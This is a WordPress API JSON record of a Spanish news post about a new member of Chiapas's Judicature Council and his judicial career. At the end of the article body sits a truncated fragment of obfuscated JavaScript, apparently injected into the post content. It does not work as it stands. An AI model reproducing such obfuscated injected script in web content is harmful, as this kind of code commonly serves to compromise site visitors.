{"id":14582,"date":"2024-03-09T02:27:27","date_gmt":"2024-03-09T02:27:27","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=14582"},"modified":"2024-03-09T02:27:27","modified_gmt":"2024-03-09T02:27:27","slug":"nuevo-consejero-de-la-judicatura-se-integra-al-poder-judicial-del-estado","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=14582","title":{"rendered":"Nuevo consejero de la Judicatura se integra al Poder Judicial del Estado"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"756\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/WhatsApp-Image-2024-03-06-at-8.56.39-PM-1024x756.jpeg\" alt=\"\" class=\"wp-image-14583\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/WhatsApp-Image-2024-03-06-at-8.56.39-PM-1024x756.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/WhatsApp-Image-2024-03-06-at-8.56.39-PM-300x221.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/WhatsApp-Image-2024-03-06-at-8.56.39-PM-768x567.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/WhatsApp-Image-2024-03-06-at-8.56.39-PM.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>08 de Marzo del 2024. Luego de que el Poder Legislativo tomara protesta y juramento al nuevo consejero de la Judicatura, Jos\u00e9 Francisco Trujillo Ochoa, el titular del Poder Judicial del Estado lo recibi\u00f3 en las instalaciones de la casa de la justicia, donde realiz\u00f3 una salutaci\u00f3n oficial.El magistrado presidente, acompa\u00f1ado de las consejeras y el consejero en funciones, dio la bienvenida al nuevo integrante del Consejo de la Judicatura, reconociendo su amplia trayectoria jurisdiccional.Por su parte, el reci\u00e9n nombrado consejero, agradeci\u00f3 la atenci\u00f3n y se comprometi\u00f3 a trabajar de inmediato al servicio de la ciudadan\u00eda, en beneficio de la impartici\u00f3n de justicia en la entidad.Previamente, en sesi\u00f3n extraordinaria, encabezada por la presidenta de la Mesa Directiva de la LXVIII Legislatura del Honorable Congreso del Estado, respaldada por unanimidad de sus integrantes seg\u00fan los Art\u00edculos 130, 131, 11 p\u00e1rrafo segundo y Art\u00edculo 74, p\u00e1rrafo dos de la Constituci\u00f3n Pol\u00edtica del Estado Libre y Soberano de Chiapas y a propuesta del titular de la casa de la justicia, se le tom\u00f3 la protesta de ley, dando cumplimiento a la normativa en la materia.Jos\u00e9 Francisco Trujillo Ochoa, fue titular del Poder Judicial del Estado de Chiapas en el per\u00edodo de 1991 a 1993, adem\u00e1s de ocupar diversos cargos en la propia instituci\u00f3n y formar parte de la transformaci\u00f3n f\u00edsica de los actuales edificios, ya que en su administraci\u00f3n se coloc\u00f3 la primera piedra de lo que ser\u00eda el actual Palacio de Justicia de Tuxtla Guti\u00e9rrez, de igual menera, inaugur\u00f3 el entonces Centro de Capacitaci\u00f3n y Actualizaci\u00f3n Judicial, hoy Instituto de Formaci\u00f3n Profesionalizaci\u00f3n y Carrera Judicial; lo que evidencia el continuo impulso por la carrera judicial, en beneficio de todas y todos los chiapanecos.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>08 de Marzo del 2024. Luego de que el Poder Legislativo tomara protesta y juramento al nuevo consejero de la Judicatura, Jos\u00e9 Francisco Trujillo Ochoa, el titular del Poder Judicial del Estado lo recibi\u00f3 en las instalaciones de la casa de la justicia, donde realiz\u00f3 una salutaci\u00f3n oficial.El magistrado presidente, acompa\u00f1ado de las consejeras y &hellip;<\/p>\n","protected":false},"author":2,"featured_media":14583,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-14582","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14582","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=14582"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14582\/revisions"}],"predecessor-version":[{"id":14584,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14582\/revisions\/14584"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/14583"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=14582"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=14582"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=14582"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}